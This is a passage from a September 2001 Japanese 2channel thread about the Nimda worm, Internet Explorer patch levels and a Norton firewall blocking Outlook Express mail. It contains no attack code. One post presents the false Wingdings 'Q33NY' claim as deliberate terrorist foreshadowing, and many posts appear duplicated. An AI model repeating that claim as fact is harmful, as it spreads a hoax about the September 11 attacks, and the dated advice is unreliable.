>多分q295106;ってのは、SP2入れたあとに当てたHotfixのナンバーだと思います。
これは私には理解できないのですが
ひとまず安心しました、ありがとうございました。
757 :1:01/09/20 23:51 ID:vo3oEjAs
ところでさぁ、ウィルスなんかの名前ってどこが付けてるの?
各会社が同じ名前(Nimda)を元にTROJ_NIMDAとかW32_NIMDAとか付けるわけでしょ?
どっかそういう機関でもあるのん?それとも各社が申し合わせて付けるの?
と、検索もせずに書こうとした俺はつくづく厨房だ…。
検索したらぞろぞろ出てきた。
『CNET Briefs Tech News:ウィルスの名前はどうやって決まる?』
http://cnet.sphere.ne.jp/News/1999/Item/990402-2.html
各会社が同じ名前(Nimda)を元にTROJ_NIMDAとかW32_NIMDAとか付けるわけでしょ?
どっかそういう機関でもあるのん?それとも各社が申し合わせて付けるの?
と、検索もせずに書こうとした俺はつくづく厨房だ…。
検索したらぞろぞろ出てきた。
『CNET Briefs Tech News:ウィルスの名前はどうやって決まる?』
http://cnet.sphere.ne.jp/News/1999/Item/990402-2.html
758 :751:01/09/20 23:52 ID:N/KFDXpc
>>752 >>754 >>755
ご指導ありがとうございました。
おかげさまで正常復帰いたしました。
ウィルスが跳梁跋扈する混沌とした時にこのような症状にみまわれ
被害妄想してしまいました。
以後、日々精進する次第でございます。
ご指導ありがとうございました。
おかげさまで正常復帰いたしました。
ウィルスが跳梁跋扈する混沌とした時にこのような症状にみまわれ
被害妄想してしまいました。
以後、日々精進する次第でございます。
759 :ビルド番号ない…??:01/09/21 00:44 ID:O./a2ZJo
私もIe5.00で昨日SP2にアップした筈なんだけど
今>>738さんのリンクからビルド番号見に行ったら
5.00.3314.2101が無い…何故なのでしょう。
更新バージョンにはSP2となっているのに。
今>>738さんのリンクからビルド番号見に行ったら
5.00.3314.2101が無い…何故なのでしょう。
更新バージョンにはSP2となっているのに。
760 :名無したんに接続中・・・:01/09/21 00:49 ID:z4aEgZIo
ウィルス被害・駆除・対処については
[N速] スーパー初心者のためのMSNウイルスすれ。3
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627
こちらに統一ってことでいい?
[N速] スーパー初心者のためのMSNウイルスすれ。3
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627
こちらに統一ってことでいい?
761 :1:01/09/21 01:38 ID:Cn/ca6n.
762 : :01/09/21 01:52 ID:pVejkjE6
763 :nana:01/09/21 02:43 ID:gAzAZ9Xs
IE6.0入れてNortonもLiveUpdateしておきました。
で、OE開いてメールチェックしようとしたら接続できない。
サーバーへの接続は失敗しました。 アカウント :(サーバー名) '', サーバー : 'pop3.norton.antivirus',
プロトコル : POP3, ポート : 110, セキュリティ (SSL): なし, ソケット エラー : 10061, エラー番号 : 0x800CCC0E
ノートン先生、ふさいでるやんけ(笑)
pop3サーバーを書き換えたところNortonのAlertTrackerに
C\..OUTLOOK EXPRESS\(サーバー名).EXE用に自動的に作成されたアクセス規制です
が作成されました。
これで受信が可能になったことを確認。めでたい。
さて、この報告ってガイシュツですか?
私はCATVユーザーなんですがそれとはまさか関係ないっすよね(笑)
バージョンアップ後なぜかメールが来ないという方、私と同様なのかも。
ちなみにNorton Internet Security 2001使ってます。
Norton Antivirusはバージョン7.07.23Dです。
で、OE開いてメールチェックしようとしたら接続できない。
サーバーへの接続は失敗しました。 アカウント :(サーバー名) '', サーバー : 'pop3.norton.antivirus',
プロトコル : POP3, ポート : 110, セキュリティ (SSL): なし, ソケット エラー : 10061, エラー番号 : 0x800CCC0E
ノートン先生、ふさいでるやんけ(笑)
pop3サーバーを書き換えたところNortonのAlertTrackerに
C\..OUTLOOK EXPRESS\(サーバー名).EXE用に自動的に作成されたアクセス規制です
が作成されました。
これで受信が可能になったことを確認。めでたい。
さて、この報告ってガイシュツですか?
私はCATVユーザーなんですがそれとはまさか関係ないっすよね(笑)
バージョンアップ後なぜかメールが来ないという方、私と同様なのかも。
ちなみにNorton Internet Security 2001使ってます。
Norton Antivirusはバージョン7.07.23Dです。
764 : :01/09/21 02:44 ID:TjLYCyGo
お絵かき掲示板で2時間かけて書いた絵を投稿
しかし投稿後には掲示板には何も現れなかった
私の絵は何処へ行ったのでしょう
私の2時間を返してください
しかし投稿後には掲示板には何も現れなかった
私の絵は何処へ行ったのでしょう
私の2時間を返してください
766 : :01/09/21 03:03 ID:MZxlibTQ
767 : :01/09/21 09:54 ID:jkPrmf76
気をつけようage
768 : :01/09/21 10:50 ID:BO1YDHuI
769 :中国一号:01/09/21 16:17 ID:eHSF.gJ6
現在のTopics
・最小構成及びカスタムインストールで入れたIE6には脆弱性が残っているらしい。
・バージョン情報で表示される「SP2」の表示はあてにならない可能性がある。
例えばIE5.5を入れたマシンに後からWindows2000SP2を入れた場合。
・最小構成及びカスタムインストールで入れたIE6には脆弱性が残っているらしい。
・バージョン情報で表示される「SP2」の表示はあてにならない可能性がある。
例えばIE5.5を入れたマシンに後からWindows2000SP2を入れた場合。
770 : :01/09/21 17:07 ID:P7EnO3u6
771 :如何:01/09/21 18:48 ID:0LRK9S/s
↑いまいち文章が理解できないんですが、IE6+WMP6.4のままでは
感染したWebページに訪問すると、予告なしに感染するということですか?
IE6を標準インストしてもWMP6.4のままなんですが・・・
感染したWebページに訪問すると、予告なしに感染するということですか?
IE6を標準インストしてもWMP6.4のままなんですが・・・
他のスレ見に行ったけど
IE6の「最小構成インストール、またはブラウザのカスタマイズ」
でなければ”見ただけ感染”は防げそうだね。
条件反射でカキコすまん。有意義な意見交換をどうぞ。
でも昨日までの情報ではIE6でオーケーだったじゃん。ネスケで様子見よかな。
IE6の「最小構成インストール、またはブラウザのカスタマイズ」
でなければ”見ただけ感染”は防げそうだね。
条件反射でカキコすまん。有意義な意見交換をどうぞ。
でも昨日までの情報ではIE6でオーケーだったじゃん。ネスケで様子見よかな。
773 :風雪名無し旅:01/09/21 22:29 ID:kwhNwIvs
とりあえずネ介、貼っておきます。
http://home.netscape.com/ja/
当方IE5.5SP2→ネ助6.1→IE6.0と流転しています。
ネ介とIE6.0併用・使い分けというのが好いんじゃないかというのが現時点での見解。
http://home.netscape.com/ja/
当方IE5.5SP2→ネ助6.1→IE6.0と流転しています。
ネ介とIE6.0併用・使い分けというのが好いんじゃないかというのが現時点での見解。
774 : :01/09/22 08:14 ID:slrKuN92
0時〜8時でaccess.logに残ったNimdaログが700行越えたよ…。
しかし標準インスト以外のIE6=SP2無しのIE5.5かい…
うちカスタムだわ。ノートン先生に頼るしかないか。
うちカスタムだわ。ノートン先生に頼るしかないか。
776 :名無したんに接続中・・・:01/09/22 15:03 ID:PZCkjjns
777 :777:01/09/22 17:07 ID:zHNb8uf.
777GET!!!!!!
778 :LA生中継:01/09/22 17:09 ID:VrPQJA8M
Microsoft Wordで
1.新規作成で先週ハイジャックされた飛行機のどれか一つの空便を英大文字で入力。例‐ Q33NY
2.フォントで 入力した空便を選択してサイズを36等に変更。
3.そのまま、英文字用のフォントで”Wingdings”に変更。
・・・で変換すると・・・。
凄まじい緻密なテロですね。
1.新規作成で先週ハイジャックされた飛行機のどれか一つの空便を英大文字で入力。例‐ Q33NY
2.フォントで 入力した空便を選択してサイズを36等に変更。
3.そのまま、英文字用のフォントで”Wingdings”に変更。
・・・で変換すると・・・。
凄まじい緻密なテロですね。
っつかよく探したよなー。
単なるひっかけだとばっか思ってた。
単なるひっかけだとばっか思ってた。
781 : :01/09/23 10:29 ID:gKhH6E9w
他の飛行機の空便名もきぼん!
782 : :